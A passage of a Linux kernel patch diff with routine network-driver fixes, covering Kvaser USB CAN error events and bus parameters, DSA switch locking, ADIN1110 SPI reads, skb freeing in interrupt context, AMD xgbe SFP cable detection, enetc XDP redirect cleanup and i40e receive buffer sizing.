++		info1 = le16_to_cpu(cmd->u.leaf.error_event.info1);
++		break;
++	case KVASER_USBCAN:
++		info1 = le16_to_cpu(cmd->u.usbcan.error_event.info1);
++		break;
++	}
++
++	/* info1 will contain the offending cmd_no */
++	switch (info1) {
++	case CMD_SET_CTRL_MODE:
++		dev_warn(&dev->intf->dev,
++			 "CMD_SET_CTRL_MODE error in parameter\n");
++		break;
++
++	case CMD_SET_BUS_PARAMS:
++		dev_warn(&dev->intf->dev,
++			 "CMD_SET_BUS_PARAMS error in parameter\n");
++		break;
++
++	default:
++		dev_warn(&dev->intf->dev,
++			 "Unhandled parameter error event cmd_no (%u)\n",
++			 info1);
++		break;
++	}
++}
++
++static void kvaser_usb_leaf_error_event(const struct kvaser_usb *dev,
++					const struct kvaser_cmd *cmd)
++{
++	u8 error_code = 0;
++
++	switch (dev->driver_info->family) {
++	case KVASER_LEAF:
++		error_code = cmd->u.leaf.error_event.error_code;
++		break;
++	case KVASER_USBCAN:
++		error_code = cmd->u.usbcan.error_event.error_code;
++		break;
++	}
++
++	switch (error_code) {
++	case KVASER_USB_LEAF_ERROR_EVENT_TX_QUEUE_FULL:
++		/* Received additional CAN message, when firmware TX queue is
++		 * already full. Something is wrong with the driver.
++		 * This should never happen!
++		 */
++		dev_err(&dev->intf->dev,
++			"Received error event TX_QUEUE_FULL\n");
++		break;
++	case KVASER_USB_LEAF_ERROR_EVENT_PARAM:
++		kvaser_usb_leaf_error_event_parameter(dev, cmd);
++		break;
++
++	default:
++		dev_warn(&dev->intf->dev,
++			 "Unhandled error event (%d)\n", error_code);
++		break;
++	}
++}
++
+ static void kvaser_usb_leaf_start_chip_reply(const struct kvaser_usb *dev,
+ 					     const struct kvaser_cmd *cmd)
+ {
+@@ -1202,6 +1466,25 @@ static void kvaser_usb_leaf_stop_chip_reply(const struct kvaser_usb *dev,
+ 	complete(&priv->stop_comp);
+ }
+ 
++static void kvaser_usb_leaf_get_busparams_reply(const struct kvaser_usb *dev,
++						const struct kvaser_cmd *cmd)
++{
++	struct kvaser_usb_net_priv *priv;
++	u8 channel = cmd->u.busparams.channel;
++
++	if (channel >= dev->nchannels) {
++		dev_err(&dev->intf->dev,
++			"Invalid channel number (%d)\n", channel);
++		return;
++	}
++
++	priv = dev->nets[channel];
++	memcpy(&priv->busparams_nominal, &cmd->u.busparams.busparams,
++	       sizeof(priv->busparams_nominal));
++
++	complete(&priv->get_busparams_comp);
++}
++
+ static void kvaser_usb_leaf_handle_command(const struct kvaser_usb *dev,
+ 					   const struct kvaser_cmd *cmd)
+ {
+@@ -1240,6 +1523,14 @@ static void kvaser_usb_leaf_handle_command(const struct kvaser_usb *dev,
+ 		kvaser_usb_leaf_tx_acknowledge(dev, cmd);
+ 		break;
+ 
++	case CMD_ERROR_EVENT:
++		kvaser_usb_leaf_error_event(dev, cmd);
++		break;
++
++	case CMD_GET_BUS_PARAMS_REPLY:
++		kvaser_usb_leaf_get_busparams_reply(dev, cmd);
++		break;
++
+ 	/* Ignored commands */
+ 	case CMD_USBCAN_CLOCK_OVERFLOW_EVENT:
+ 		if (dev->driver_info->family != KVASER_USBCAN)
+@@ -1336,10 +1627,13 @@ static int kvaser_usb_leaf_start_chip(struct kvaser_usb_net_priv *priv)
+ 
+ static int kvaser_usb_leaf_stop_chip(struct kvaser_usb_net_priv *priv)
+ {
++	struct kvaser_usb_net_leaf_priv *leaf = priv->sub_priv;
+ 	int err;
+ 
+ 	reinit_completion(&priv->stop_comp);
+ 
++	cancel_delayed_work(&leaf->chip_state_req_work);
++
+ 	err = kvaser_usb_leaf_send_simple_cmd(priv->dev, CMD_STOP_CHIP,
+ 					      priv->channel);
+ 	if (err)
+@@ -1386,10 +1680,35 @@ static int kvaser_usb_leaf_init_card(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
+-static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
++static int kvaser_usb_leaf_init_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_leaf_priv *leaf;
++
++	leaf = devm_kzalloc(&priv->dev->intf->dev, sizeof(*leaf), GFP_KERNEL);
++	if (!leaf)
++		return -ENOMEM;
++
++	leaf->net = priv;
++	INIT_DELAYED_WORK(&leaf->chip_state_req_work,
++			  kvaser_usb_leaf_chip_state_req_work);
++
++	priv->sub_priv = leaf;
++
++	return 0;
++}
++
++static void kvaser_usb_leaf_remove_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_leaf_priv *leaf = priv->sub_priv;
++
++	if (leaf)
++		cancel_delayed_work_sync(&leaf->chip_state_req_work);
++}
++
++static int kvaser_usb_leaf_set_bittiming(const struct net_device *netdev,
++					 const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *bt = &priv->can.bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+ 	struct kvaser_cmd *cmd;
+ 	int rc;
+@@ -1402,15 +1721,8 @@ static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
+ 	cmd->len = CMD_HEADER_LEN + sizeof(struct kvaser_cmd_busparams);
+ 	cmd->u.busparams.channel = priv->channel;
+ 	cmd->u.busparams.tid = 0xff;
+-	cmd->u.busparams.bitrate = cpu_to_le32(bt->bitrate);
+-	cmd->u.busparams.sjw = bt->sjw;
+-	cmd->u.busparams.tseg1 = bt->prop_seg + bt->phase_seg1;
+-	cmd->u.busparams.tseg2 = bt->phase_seg2;
+-
+-	if (priv->can.ctrlmode & CAN_CTRLMODE_3_SAMPLES)
+-		cmd->u.busparams.no_samp = 3;
+-	else
+-		cmd->u.busparams.no_samp = 1;
++	memcpy(&cmd->u.busparams.busparams, busparams,
++	       sizeof(cmd->u.busparams.busparams));
+ 
+ 	rc = kvaser_usb_send_cmd(dev, cmd, cmd->len);
+ 
+@@ -1418,6 +1730,27 @@ static int kvaser_usb_leaf_set_bittiming(struct net_device *netdev)
+ 	return rc;
+ }
+ 
++static int kvaser_usb_leaf_get_busparams(struct kvaser_usb_net_priv *priv)
++{
++	int err;
++
++	if (priv->dev->driver_info->family == KVASER_USBCAN)
++		return -EOPNOTSUPP;
++
++	reinit_completion(&priv->get_busparams_comp);
++
++	err = kvaser_usb_leaf_send_simple_cmd(priv->dev, CMD_GET_BUS_PARAMS,
++					      priv->channel);
++	if (err)
++		return err;
++
++	if (!wait_for_completion_timeout(&priv->get_busparams_comp,
++					 msecs_to_jiffies(KVASER_USB_TIMEOUT)))
++		return -ETIMEDOUT;
++
++	return 0;
++}
++
+ static int kvaser_usb_leaf_set_mode(struct net_device *netdev,
+ 				    enum can_mode mode)
+ {
+@@ -1479,14 +1812,18 @@ static int kvaser_usb_leaf_setup_endpoints(struct kvaser_usb *dev)
+ const struct kvaser_usb_dev_ops kvaser_usb_leaf_dev_ops = {
+ 	.dev_set_mode = kvaser_usb_leaf_set_mode,
+ 	.dev_set_bittiming = kvaser_usb_leaf_set_bittiming,
++	.dev_get_busparams = kvaser_usb_leaf_get_busparams,
+ 	.dev_set_data_bittiming = NULL,
++	.dev_get_data_busparams = NULL,
+ 	.dev_get_berr_counter = kvaser_usb_leaf_get_berr_counter,
+ 	.dev_setup_endpoints = kvaser_usb_leaf_setup_endpoints,
+ 	.dev_init_card = kvaser_usb_leaf_init_card,
++	.dev_init_channel = kvaser_usb_leaf_init_channel,
++	.dev_remove_channel = kvaser_usb_leaf_remove_channel,
+ 	.dev_get_software_info = kvaser_usb_leaf_get_software_info,
+ 	.dev_get_software_details = NULL,
+ 	.dev_get_card_info = kvaser_usb_leaf_get_card_info,
+-	.dev_get_capabilities = NULL,
++	.dev_get_capabilities = kvaser_usb_leaf_get_capabilities,
+ 	.dev_set_opt_mode = kvaser_usb_leaf_set_opt_mode,
+ 	.dev_start_chip = kvaser_usb_leaf_start_chip,
+ 	.dev_stop_chip = kvaser_usb_leaf_stop_chip,
+diff --git a/drivers/net/dsa/lan9303-core.c b/drivers/net/dsa/lan9303-core.c
+index 80f07bd205934..2e270b4791432 100644
+--- a/drivers/net/dsa/lan9303-core.c
++++ b/drivers/net/dsa/lan9303-core.c
+@@ -1005,9 +1005,11 @@ static void lan9303_get_ethtool_stats(struct dsa_switch *ds, int port,
+ 		ret = lan9303_read_switch_port(
+ 			chip, port, lan9303_mib[u].offset, &reg);
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(chip->dev, "Reading status port %d reg %u failed\n",
+ 				 port, lan9303_mib[u].offset);
++			reg = 0;
++		}
+ 		data[u] = reg;
+ 	}
+ }
+diff --git a/drivers/net/dsa/microchip/ksz_common.c b/drivers/net/dsa/microchip/ksz_common.c
+index d612181b3226e..c68f48cd1ec08 100644
+--- a/drivers/net/dsa/microchip/ksz_common.c
++++ b/drivers/net/dsa/microchip/ksz_common.c
+@@ -1883,8 +1883,7 @@ static int ksz_irq_common_setup(struct ksz_device *dev, struct ksz_irq *kirq)
+ 		irq_create_mapping(kirq->domain, n);
+ 
+ 	ret = request_threaded_irq(kirq->irq_num, NULL, ksz_irq_thread_fn,
+-				   IRQF_ONESHOT | IRQF_TRIGGER_FALLING,
+-				   kirq->name, kirq);
++				   IRQF_ONESHOT, kirq->name, kirq);
+ 	if (ret)
+ 		goto out;
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index 937cb22cb3d48..3b8b2d0fbafaf 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -689,13 +689,12 @@ static void mv88e6352_phylink_get_caps(struct mv88e6xxx_chip *chip, int port,
+ 
+ 	/* Port 4 supports automedia if the serdes is associated with it. */
+ 	if (port == 4) {
+-		mv88e6xxx_reg_lock(chip);
+ 		err = mv88e6352_g2_scratch_port_has_serdes(chip, port);
+ 		if (err < 0)
+ 			dev_err(chip->dev, "p%d: failed to read scratch\n",
+ 				port);
+ 		if (err <= 0)
+-			goto unlock;
++			return;
+ 
+ 		cmode = mv88e6352_get_port4_serdes_cmode(chip);
+ 		if (cmode < 0)
+@@ -703,8 +702,6 @@ static void mv88e6352_phylink_get_caps(struct mv88e6xxx_chip *chip, int port,
+ 				port);
+ 		else
+ 			mv88e6xxx_translate_cmode(cmode, supported);
+-unlock:
+-		mv88e6xxx_reg_unlock(chip);
+ 	}
+ }
+ 
+@@ -831,7 +828,9 @@ static void mv88e6xxx_get_caps(struct dsa_switch *ds, int port,
+ {
+ 	struct mv88e6xxx_chip *chip = ds->priv;
+ 
++	mv88e6xxx_reg_lock(chip);
+ 	chip->info->ops->phylink_get_caps(chip, port, config);
++	mv88e6xxx_reg_unlock(chip);
+ 
+ 	if (mv88e6xxx_phy_is_internal(ds, port)) {
+ 		__set_bit(PHY_INTERFACE_MODE_INTERNAL,
+@@ -3307,7 +3306,7 @@ static int mv88e6xxx_setup_port(struct mv88e6xxx_chip *chip, int port)
+ 		struct phylink_config pl_config = {};
+ 		unsigned long caps;
+ 
+-		mv88e6xxx_get_caps(ds, port, &pl_config);
++		chip->info->ops->phylink_get_caps(chip, port, &pl_config);
+ 
+ 		caps = pl_config.mac_capabilities;
+ 
+diff --git a/drivers/net/ethernet/adi/adin1110.c b/drivers/net/ethernet/adi/adin1110.c
+index 606c976108085..9d8dfe1729948 100644
+--- a/drivers/net/ethernet/adi/adin1110.c
++++ b/drivers/net/ethernet/adi/adin1110.c
+@@ -196,7 +196,7 @@ static int adin1110_read_reg(struct adin1110_priv *priv, u16 reg, u32 *val)
+ {
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+ 	u32 read_len = ADIN1110_REG_LEN;
+-	struct spi_transfer t[2] = {0};
++	struct spi_transfer t = {0};
+ 	int ret;
+ 
+ 	priv->data[0] = ADIN1110_CD | FIELD_GET(GENMASK(12, 8), reg);
+@@ -209,17 +209,15 @@ static int adin1110_read_reg(struct adin1110_priv *priv, u16 reg, u32 *val)
+ 		header_len++;
+ 	}
+ 
+-	t[0].tx_buf = &priv->data[0];
+-	t[0].len = header_len;
+-
+ 	if (priv->append_crc)
+ 		read_len++;
+ 
+ 	memset(&priv->data[header_len], 0, read_len);
+-	t[1].rx_buf = &priv->data[header_len];
+-	t[1].len = read_len;
++	t.tx_buf = &priv->data[0];
++	t.rx_buf = &priv->data[0];
++	t.len = read_len + header_len;
+ 
+-	ret = spi_sync_transfer(priv->spidev, t, 2);
++	ret = spi_sync_transfer(priv->spidev, &t, 1);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -296,7 +294,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ {
+ 	struct adin1110_priv *priv = port_priv->priv;
+ 	u32 header_len = ADIN1110_RD_HEADER_LEN;
+-	struct spi_transfer t[2] = {0};
++	struct spi_transfer t;
+ 	u32 frame_size_no_fcs;
+ 	struct sk_buff *rxb;
+ 	u32 frame_size;
+@@ -327,12 +325,7 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 		return ret;
+ 
+ 	frame_size_no_fcs = frame_size - ADIN1110_FRAME_HEADER_LEN - ADIN1110_FEC_LEN;
+-
+-	rxb = netdev_alloc_skb(port_priv->netdev, round_len);
+-	if (!rxb)
+-		return -ENOMEM;
+-
+-	memset(priv->data, 0, round_len + ADIN1110_RD_HEADER_LEN);
++	memset(priv->data, 0, ADIN1110_RD_HEADER_LEN);
+ 
+ 	priv->data[0] = ADIN1110_CD | FIELD_GET(GENMASK(12, 8), reg);
+ 	priv->data[1] = FIELD_GET(GENMASK(7, 0), reg);
+@@ -342,21 +335,23 @@ static int adin1110_read_fifo(struct adin1110_port_priv *port_priv)
+ 		header_len++;
+ 	}
+ 
+-	skb_put(rxb, frame_size_no_fcs + ADIN1110_FRAME_HEADER_LEN);
++	rxb = netdev_alloc_skb(port_priv->netdev, round_len + header_len);
++	if (!rxb)
++		return -ENOMEM;
+ 
+-	t[0].tx_buf = &priv->data[0];
+-	t[0].len = header_len;
++	skb_put(rxb, frame_size_no_fcs + header_len + ADIN1110_FRAME_HEADER_LEN);
+ 
+-	t[1].rx_buf = &rxb->data[0];
+-	t[1].len = round_len;
++	t.tx_buf = &priv->data[0];
++	t.rx_buf = &rxb->data[0];
++	t.len = header_len + round_len;
+ 
+-	ret = spi_sync_transfer(priv->spidev, t, 2);
++	ret = spi_sync_transfer(priv->spidev, &t, 1);
+ 	if (ret) {
+ 		kfree_skb(rxb);
+ 		return ret;
+ 	}
+ 
+-	skb_pull(rxb, ADIN1110_FRAME_HEADER_LEN);
++	skb_pull(rxb, header_len + ADIN1110_FRAME_HEADER_LEN);
+ 	rxb->protocol = eth_type_trans(rxb, port_priv->netdev);
+ 
+ 	if ((port_priv->flags & IFF_ALLMULTI && rxb->pkt_type == PACKET_MULTICAST) ||
+diff --git a/drivers/net/ethernet/amd/atarilance.c b/drivers/net/ethernet/amd/atarilance.c
+index 3222c48ce6ae4..ec704222925d8 100644
+--- a/drivers/net/ethernet/amd/atarilance.c
++++ b/drivers/net/ethernet/amd/atarilance.c
+@@ -824,7 +824,7 @@ lance_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 	lp->memcpy_f( PKTBUF_ADDR(head), (void *)skb->data, skb->len );
+ 	head->flag = TMD1_OWN_CHIP | TMD1_ENP | TMD1_STP;
+ 	dev->stats.tx_bytes += skb->len;
+-	dev_kfree_skb( skb );
++	dev_consume_skb_irq(skb);
+ 	lp->cur_tx++;
+ 	while( lp->cur_tx >= TX_RING_SIZE && lp->dirty_tx >= TX_RING_SIZE ) {
+ 		lp->cur_tx -= TX_RING_SIZE;
+diff --git a/drivers/net/ethernet/amd/lance.c b/drivers/net/ethernet/amd/lance.c
+index fb8686214a327..8971665a4b2ac 100644
+--- a/drivers/net/ethernet/amd/lance.c
++++ b/drivers/net/ethernet/amd/lance.c
+@@ -1001,7 +1001,7 @@ static netdev_tx_t lance_start_xmit(struct sk_buff *skb,
+ 		skb_copy_from_linear_data(skb, &lp->tx_bounce_buffs[entry], skb->len);
+ 		lp->tx_ring[entry].base =
+ 			((u32)isa_virt_to_bus((lp->tx_bounce_buffs + entry)) & 0xffffff) | 0x83000000;
+-		dev_kfree_skb(skb);
++		dev_consume_skb_irq(skb);
+ 	} else {
+ 		lp->tx_skbuff[entry] = skb;
+ 		lp->tx_ring[entry].base = ((u32)isa_virt_to_bus(skb->data) & 0xffffff) | 0x83000000;
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c b/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
+index 4064c3e3dd492..c731a04731f83 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-phy-v2.c
+@@ -189,6 +189,7 @@ enum xgbe_sfp_cable {
+ 	XGBE_SFP_CABLE_UNKNOWN = 0,
+ 	XGBE_SFP_CABLE_ACTIVE,
+ 	XGBE_SFP_CABLE_PASSIVE,
++	XGBE_SFP_CABLE_FIBER,
+ };
+ 
+ enum xgbe_sfp_base {
+@@ -236,10 +237,7 @@ enum xgbe_sfp_speed {
+ 
+ #define XGBE_SFP_BASE_BR			12
+ #define XGBE_SFP_BASE_BR_1GBE_MIN		0x0a
+-#define XGBE_SFP_BASE_BR_1GBE_MAX		0x0d
+ #define XGBE_SFP_BASE_BR_10GBE_MIN		0x64
+-#define XGBE_SFP_BASE_BR_10GBE_MAX		0x68
+-#define XGBE_MOLEX_SFP_BASE_BR_10GBE_MAX	0x78
+ 
+ #define XGBE_SFP_BASE_CU_CABLE_LEN		18
+ 
+@@ -826,29 +824,22 @@ static void xgbe_phy_sfp_phy_settings(struct xgbe_prv_data *pdata)
+ static bool xgbe_phy_sfp_bit_rate(struct xgbe_sfp_eeprom *sfp_eeprom,
+ 				  enum xgbe_sfp_speed sfp_speed)
+ {
+-	u8 *sfp_base, min, max;
++	u8 *sfp_base, min;
+ 
+ 	sfp_base = sfp_eeprom->base;
+ 
+ 	switch (sfp_speed) {
+ 	case XGBE_SFP_SPEED_1000:
+ 		min = XGBE_SFP_BASE_BR_1GBE_MIN;
+-		max = XGBE_SFP_BASE_BR_1GBE_MAX;
+ 		break;
+ 	case XGBE_SFP_SPEED_10000:
+ 		min = XGBE_SFP_BASE_BR_10GBE_MIN;
+-		if (memcmp(&sfp_eeprom->base[XGBE_SFP_BASE_VENDOR_NAME],
+-			   XGBE_MOLEX_VENDOR, XGBE_SFP_BASE_VENDOR_NAME_LEN) == 0)
+-			max = XGBE_MOLEX_SFP_BASE_BR_10GBE_MAX;
+-		else
+-			max = XGBE_SFP_BASE_BR_10GBE_MAX;
+ 		break;
+ 	default:
+ 		return false;
+ 	}
+ 
+-	return ((sfp_base[XGBE_SFP_BASE_BR] >= min) &&
+-		(sfp_base[XGBE_SFP_BASE_BR] <= max));
++	return sfp_base[XGBE_SFP_BASE_BR] >= min;
+ }
+ 
+ static void xgbe_phy_free_phy_device(struct xgbe_prv_data *pdata)
+@@ -1149,16 +1140,18 @@ static void xgbe_phy_sfp_parse_eeprom(struct xgbe_prv_data *pdata)
+ 	phy_data->sfp_tx_fault = xgbe_phy_check_sfp_tx_fault(phy_data);
+ 	phy_data->sfp_rx_los = xgbe_phy_check_sfp_rx_los(phy_data);
+ 
+-	/* Assume ACTIVE cable unless told it is PASSIVE */
++	/* Assume FIBER cable unless told otherwise */
+ 	if (sfp_base[XGBE_SFP_BASE_CABLE] & XGBE_SFP_BASE_CABLE_PASSIVE) {
+ 		phy_data->sfp_cable = XGBE_SFP_CABLE_PASSIVE;
+ 		phy_data->sfp_cable_len = sfp_base[XGBE_SFP_BASE_CU_CABLE_LEN];
+-	} else {
++	} else if (sfp_base[XGBE_SFP_BASE_CABLE] & XGBE_SFP_BASE_CABLE_ACTIVE) {
+ 		phy_data->sfp_cable = XGBE_SFP_CABLE_ACTIVE;
++	} else {
++		phy_data->sfp_cable = XGBE_SFP_CABLE_FIBER;
+ 	}
+ 
+ 	/* Determine the type of SFP */
+-	if (phy_data->sfp_cable == XGBE_SFP_CABLE_PASSIVE &&
++	if (phy_data->sfp_cable != XGBE_SFP_CABLE_FIBER &&
+ 	    xgbe_phy_sfp_bit_rate(sfp_eeprom, XGBE_SFP_SPEED_10000))
+ 		phy_data->sfp_base = XGBE_SFP_BASE_10000_CR;
+ 	else if (sfp_base[XGBE_SFP_BASE_10GBE_CC] & XGBE_SFP_BASE_10GBE_CC_SR)
+diff --git a/drivers/net/ethernet/apple/bmac.c b/drivers/net/ethernet/apple/bmac.c
+index 334de0d93c899..9e653e2925f78 100644
+--- a/drivers/net/ethernet/apple/bmac.c
++++ b/drivers/net/ethernet/apple/bmac.c
+@@ -1510,7 +1510,7 @@ static void bmac_tx_timeout(struct timer_list *t)
+ 	i = bp->tx_empty;
+ 	++dev->stats.tx_errors;
+ 	if (i != bp->tx_fill) {
+-		dev_kfree_skb(bp->tx_bufs[i]);
++		dev_kfree_skb_irq(bp->tx_bufs[i]);
+ 		bp->tx_bufs[i] = NULL;
+ 		if (++i >= N_TX_RING) i = 0;
+ 		bp->tx_empty = i;
+diff --git a/drivers/net/ethernet/apple/mace.c b/drivers/net/ethernet/apple/mace.c
+index d0a771b65e888..fd1b008b7208c 100644
+--- a/drivers/net/ethernet/apple/mace.c
++++ b/drivers/net/ethernet/apple/mace.c
+@@ -846,7 +846,7 @@ static void mace_tx_timeout(struct timer_list *t)
+     if (mp->tx_bad_runt) {
+ 	mp->tx_bad_runt = 0;
+     } else if (i != mp->tx_fill) {
+-	dev_kfree_skb(mp->tx_bufs[i]);
++	dev_kfree_skb_irq(mp->tx_bufs[i]);
+ 	if (++i >= N_TX_RING)
+ 	    i = 0;
+ 	mp->tx_empty = i;
+diff --git a/drivers/net/ethernet/broadcom/bnx2.c b/drivers/net/ethernet/broadcom/bnx2.c
+index fec57f1982c86..dbe3101447804 100644
+--- a/drivers/net/ethernet/broadcom/bnx2.c
++++ b/drivers/net/ethernet/broadcom/bnx2.c
+@@ -5415,8 +5415,9 @@ bnx2_set_rx_ring_size(struct bnx2 *bp, u32 size)
+ 
+ 	bp->rx_buf_use_size = rx_size;
+ 	/* hw alignment + build_skb() overhead*/
+-	bp->rx_buf_size = SKB_DATA_ALIGN(bp->rx_buf_use_size + BNX2_RX_ALIGN) +
+-		NET_SKB_PAD + SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	bp->rx_buf_size = kmalloc_size_roundup(
++		SKB_DATA_ALIGN(bp->rx_buf_use_size + BNX2_RX_ALIGN) +
++		NET_SKB_PAD + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)));
+ 	bp->rx_jumbo_thresh = rx_size - BNX2_RX_OFFSET;
+ 	bp->rx_ring_size = size;
+ 	bp->rx_max_ring = bnx2_find_max_ring(size, BNX2_MAX_RX_RINGS);
+diff --git a/drivers/net/ethernet/dnet.c b/drivers/net/ethernet/dnet.c
+index 08184f20f5104..151ca9573be97 100644
+--- a/drivers/net/ethernet/dnet.c
++++ b/drivers/net/ethernet/dnet.c
+@@ -550,11 +550,11 @@ static netdev_tx_t dnet_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ 
+ 	skb_tx_timestamp(skb);
+ 
++	spin_unlock_irqrestore(&bp->lock, flags);
++
+ 	/* free the buffer */
+ 	dev_kfree_skb(skb);
+ 
+-	spin_unlock_irqrestore(&bp->lock, flags);
+-
+ 	return NETDEV_TX_OK;
+ }
+ 
+diff --git a/drivers/net/ethernet/freescale/enetc/enetc.c b/drivers/net/ethernet/freescale/enetc/enetc.c
+index 8671591cb7501..3a79ead5219ae 100644
+--- a/drivers/net/ethernet/freescale/enetc/enetc.c
++++ b/drivers/net/ethernet/freescale/enetc/enetc.c
+@@ -1489,23 +1489,6 @@ static void enetc_xdp_drop(struct enetc_bdr *rx_ring, int rx_ring_first,
+ 	rx_ring->stats.xdp_drops++;
+ }
+ 
+-static void enetc_xdp_free(struct enetc_bdr *rx_ring, int rx_ring_first,
+-			   int rx_ring_last)
+-{
+-	while (rx_ring_first != rx_ring_last) {
+-		struct enetc_rx_swbd *rx_swbd = &rx_ring->rx_swbd[rx_ring_first];
+-
+-		if (rx_swbd->page) {
+-			dma_unmap_page(rx_ring->dev, rx_swbd->dma, PAGE_SIZE,
+-				       rx_swbd->dir);
+-			__free_page(rx_swbd->page);
+-			rx_swbd->page = NULL;
+-		}
+-		enetc_bdr_idx_inc(rx_ring, &rx_ring_first);
+-	}
+-	rx_ring->stats.xdp_redirect_failures++;
+-}
+-
+ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 				   struct napi_struct *napi, int work_limit,
+ 				   struct bpf_prog *prog)
+@@ -1527,8 +1510,8 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 		int orig_i, orig_cleaned_cnt;
+ 		struct xdp_buff xdp_buff;
+ 		struct sk_buff *skb;
+-		int tmp_orig_i, err;
+ 		u32 bd_status;
++		int err;
+ 
+ 		rxbd = enetc_rxbd(rx_ring, i);
+ 		bd_status = le32_to_cpu(rxbd->r.lstatus);
+@@ -1615,18 +1598,16 @@ static int enetc_clean_rx_ring_xdp(struct enetc_bdr *rx_ring,
+ 				break;
+ 			}
+ 
+-			tmp_orig_i = orig_i;
+-
+-			while (orig_i != i) {
+-				enetc_flip_rx_buff(rx_ring,
+-						   &rx_ring->rx_swbd[orig_i]);
+-				enetc_bdr_idx_inc(rx_ring, &orig_i);
+-			}
+-
+ 			err = xdp_do_redirect(rx_ring->ndev, &xdp_buff, prog);
+ 			if (unlikely(err)) {
+-				enetc_xdp_free(rx_ring, tmp_orig_i, i);
++				enetc_xdp_drop(rx_ring, orig_i, i);
++				rx_ring->stats.xdp_redirect_failures++;
+ 			} else {
++				while (orig_i != i) {
++					enetc_flip_rx_buff(rx_ring,
++							   &rx_ring->rx_swbd[orig_i]);
++					enetc_bdr_idx_inc(rx_ring, &orig_i);
++				}
+ 				xdp_redirect_frm_cnt++;
+ 				rx_ring->stats.xdp_redirect++;
+ 			}
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 23e1a94b9ce45..f250b0df27fbb 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -1642,6 +1642,14 @@ fec_enet_rx_queue(struct net_device *ndev, int budget, u16 queue_id)
+ 		 * bridging applications.
+ 		 */
+ 		skb = build_skb(page_address(page), PAGE_SIZE);
++		if (unlikely(!skb)) {
++			page_pool_recycle_direct(rxq->page_pool, page);
++			ndev->stats.rx_dropped++;
++
++			netdev_err_once(ndev, "build_skb failed!\n");
++			goto rx_processing_done;
++		}
++
+ 		skb_reserve(skb, FEC_ENET_XDP_HEADROOM);
+ 		skb_put(skb, pkt_len - 4);
+ 		skb_mark_for_recycle(skb);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 6416322d7c18b..e6e349f0c9457 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -3693,6 +3693,24 @@ static int i40e_vsi_configure_tx(struct i40e_vsi *vsi)
+ 	return err;
+ }
+ 
++/**
++ * i40e_calculate_vsi_rx_buf_len - Calculates buffer length
++ *
++ * @vsi: VSI to calculate rx_buf_len from
++ */
++static u16 i40e_calculate_vsi_rx_buf_len(struct i40e_vsi *vsi)
++{
++	if (!vsi->netdev || (vsi->back->flags & I40E_FLAG_LEGACY_RX))
++		return I40E_RXBUFFER_2048;
++
++#if (PAGE_SIZE < 8192)
++	if (!I40E_2K_TOO_SMALL_WITH_PADDING && vsi->netdev->mtu <= ETH_DATA_LEN)
++		return I40E_RXBUFFER_1536 - NET_IP_ALIGN;
++#endif
++
++	return PAGE_SIZE < 8192 ? I40E_RXBUFFER_3072 : I40E_RXBUFFER_2048;
++}
++
+ /**
+  * i40e_vsi_configure_rx - Configure the VSI for Rx
+  * @vsi: the VSI being configured
+@@ -3704,20 +3722,14 @@ static int i40e_vsi_configure_rx(struct i40e_vsi *vsi)
+ 	int err = 0;
+ 	u16 i;
+ 
+-	if (!vsi->netdev || (vsi->back->flags & I40E_FLAG_LEGACY_RX)) {
+-		vsi->max_frame = I40E_MAX_RXBUFFER;
+-		vsi->rx_buf_len = I40E_RXBUFFER_2048;
++	vsi->max_frame = I40E_MAX_RXBUFFER;
++	vsi->rx_buf_len = i40e_calculate_vsi_rx_buf_len(vsi);
++
+ #if (PAGE_SIZE < 8192)
+-	} else if (!I40E_2K_TOO_SMALL_WITH_PADDING &&
+-		   (vsi->netdev->mtu <= ETH_DATA_LEN)) {
++	if (vsi->netdev && !I40E_2K_TOO_SMALL_WITH_PADDING &&
++	    vsi->netdev->mtu <= ETH_DATA_LEN)
+ 		vsi->max_frame = I40E_RXBUFFER_1536 - NET_IP_ALIGN;
+-		vsi->rx_buf_len = I40E_RXBUFFER_1536 - NET_IP_ALIGN;
+ #endif
+-	} else {
+-		vsi->max_frame = I40E_MAX_RXBUFFER;
+-		vsi->rx_buf_len = (PAGE_SIZE < 8192) ? I40E_RXBUFFER_3072 :
+-						       I40E_RXBUFFER_2048;
+-	}
+ 
+ 	/* set up individual rings */
+ 	for (i = 0; i < vsi->num_queue_pairs && !err; i++)
+@@ -13282,7 +13294,7 @@ static int i40e_xdp_setup(struct i40e_vsi *vsi, struct bpf_prog *prog,
+ 	int i;
+ 
+ 	/* Don't allow frames that span over multiple buffers */
+-	if (frame_size > vsi->rx_buf_len) {
